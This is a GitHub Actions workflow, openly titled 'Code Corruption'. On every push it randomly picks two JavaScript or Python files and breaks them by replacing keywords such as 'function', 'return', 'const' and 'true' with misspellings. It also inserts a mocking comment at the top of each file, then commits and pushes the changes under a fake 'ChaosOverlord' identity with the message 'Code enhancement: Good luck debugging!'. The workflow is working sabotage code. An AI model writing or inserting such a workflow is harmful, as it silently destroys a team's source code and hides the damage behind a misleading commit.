name: Code Corruption

on: [push]

permissions:
  contents: write

jobs:
  corrupt:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout Repository
        uses: actions/checkout@v4

      - name: Corrupt Code
        run: |
          FILES=$(find . -type f -name "*.js" -o -name "*.py" | shuf -n 2)
          
          for FILE in $FILES; do
            echo "Messing up $FILE..."
            
            sed -i 's/function/funkti0n/g' "$FILE"
            sed -i 's/return/retruun/g' "$FILE"
            sed -i 's/const/konzt/g' "$FILE"
            sed -i 's/let/luht/g' "$FILE"
            sed -i 's/else/elzz/g' "$FILE"
            sed -i 's/true/troo/g' "$FILE"
            sed -i 's/false/faulse/g' "$FILE"

            # Inject chaos comment at the top
            sed -i '1s|^|// 🔥 Work smarter, not harder. Actually, just work harder.\n|' "$FILE"
          done

      - name: Commit and Push Changes
        run: |
          git config --global user.name "ChaosOverlord"
          git config --global user.email "chaos@overlord.com"
          git add .
          git commit -m "🔥 Code enhancement: Good luck debugging!"
          git push || echo "Couldn't push. Maybe the devs got smart? 🤔"
